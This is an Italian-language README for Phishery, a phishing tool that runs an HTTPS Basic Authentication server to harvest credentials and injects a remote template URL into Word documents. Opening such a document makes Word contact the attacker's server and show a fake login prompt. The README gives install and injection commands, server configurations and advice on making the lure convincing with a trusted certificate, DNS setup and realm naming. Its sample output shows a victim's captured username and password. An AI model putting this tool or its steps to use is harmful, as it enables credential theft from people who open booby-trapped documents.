
Un raccoglitore di credenziali con autenticazione di base abilitato SSL con un iniettore di URL per modelli di documenti Word.
Phishery è un server HTTP semplice con supporto SSL, il cui scopo principale è il phishing delle credenziali tramite autenticazione di base (Basic Authentication). Phishery offre anche la possibilità di iniettare facilmente l'URL in un documento Word .docx.

La potenza di phishery è meglio dimostrata impostando il modello di un documento Word a un URL phishery. Questo fa sì che Microsoft Word effettui una richiesta all'URL, mostrando all'utente finale un dialogo di autenticazione. È possibile iniettare qualsiasi file .docx con un URL utilizzando le opzioni di phishery -i [docx in input], -o [docx in output] e -u [url].
Pacchetti specifici per sistema operativo possono essere scaricati da qui.
Estrai l'archivio e, opzionalmente, installa il binario in $PATH
$ tar -xzvf phishery*.tar.gz
$ cd phishery*
$ cp phishery /usr/local/bin
$ phishery --help
|\ \\\\__ O __ _ __
| \_/ o \ o ____ / /_ (_)____/ /_ ___ _______ __
> _ (( <_ oO / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /
| / \__+___/ / /_/ / / / / (__ ) / / / __/ / / /_/ /
|/ |/ / .___/_/ /_/_/____/_/ /_/\___/_/ \__, /
/_/ Basic Auth Credential Harvester (____/
with Word Doc Template Injector
Start the server : phishery -s settings.json -c credentials.json
Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
Options:
-h, --help Show usage and exit.
-v Show version and exit.
-s The JSON settings file used to setup the server. [default: "settings.json"]
-c The JSON file to store harvested credentials. [default: "credentials.json"]
-u The phishery URL to use as the Word document template.
-i The Word .docx file to inject with a template URL.
-o The new Word .docx file with the injected template URL.
Modifica il file settings.json fornito come necessario; di default dovrebbe apparire così:
{
"ip": "0.0.0.0",
"port": "443",
"sslCert": "server.crt",
"sslKey": "server.key",
"basicRealm": "Secure Document Gateway",
"responseStatus": 200,
"responseFile": "template.dotx",
"responseHeaders": [
["Content-Type", "application/vnd.openxmlformats-officedocument.wordprocessingml.template"]
]
}
Questa configurazione avvierà il server HTTP sulla porta 443 con SSL configurato per utilizzare server.crt e server.key. Il realm di autenticazione di base è impostato su Secure Document Gateway. Quando vengono fornite delle credenziali, viene inviato uno stato di risposta 200 insieme al contenuto del file template.dotx incluso e l'intestazione Content-Type: Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.template.
Il file delle impostazioni può anche essere configurato per restituire un corpo semplice, utilizzando responseBody, come in questo esempio:
{
"ip": "0.0.0.0",
"port": "443",
"sslCert": "server.crt",
"sslKey": "server.key",
"basicRealm": "Secure Document Gateway",
"responseStatus": 404,
"responseBody": "<h1>Not Found</h1>",
"responseHeaders": [
["Content-Type", "text/html"]
]
}
L'efficacia di questo strumento si basa principalmente sul dominio e sul realm di autenticazione di base utilizzati, poiché spesso è tutto ciò che l'utente finale vedrà quando viene attivato da un documento Office. Assicurati di puntare i tuoi record DNS A all'IP pubblico del server phishery.
Si consiglia di sostituire il certificato fornito con uno attendibile, ad esempio uno generato con LetsEncrypt. Microsoft Word su OS X impedirà il dialogo di autenticazione se il certificato non è valido, e Microsoft Word su Windows chiederà all'utente di accettare il certificato non valido.
Una volta configurato e in esecuzione il server, tutto ciò che devi fare è incorporare un URL phishery in un documento, o ovunque altro tu desideri. phishery ti offre la possibilità di iniettare il tuo URL in un documento Word come modello; le istruzioni su come fare sono riportate di seguito.
Per iniettare un documento Word con un URL modello, avrai bisogno di un file .docx e dell'URL del server phishery.
Ora esegui phishery con il tuo documento e l'URL:
$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
[+] Opening Word document: good.docx
[+] Setting Word document template to: https://secure.site.local/docs
[+] Saving injected Word document to: bad.docx
[*] Injected Word document has been saved!
Assicurati che il tuo server phishery sia in esecuzione e raggiungibile all'URL che hai usato. Ora quando il documento Word viene aperto, alla vittima verrà mostrato un dialogo di autenticazione.
Quando la vittima apre il documento, vedrai quanto segue:
$ ./phishery
[+] Credential store initialized at: credentials.json
[+] Starting HTTPS Auth Server on: 0.0.0.0:443
[*] Request Received at 2016-09-25 01:06:28: HEAD https://secure.site.local/docs
[*] Sending Basic Auth response to: 127.0.0.1
[*] New credentials harvested!
[HTTP] Host : secure.example.local
[HTTP] Request : /docs
[HTTP] User Agent : Microsoft Office Word
[HTTP] IP Address : 127.0.0.1
[AUTH] Username : john.doe
[AUTH] Password : Summer15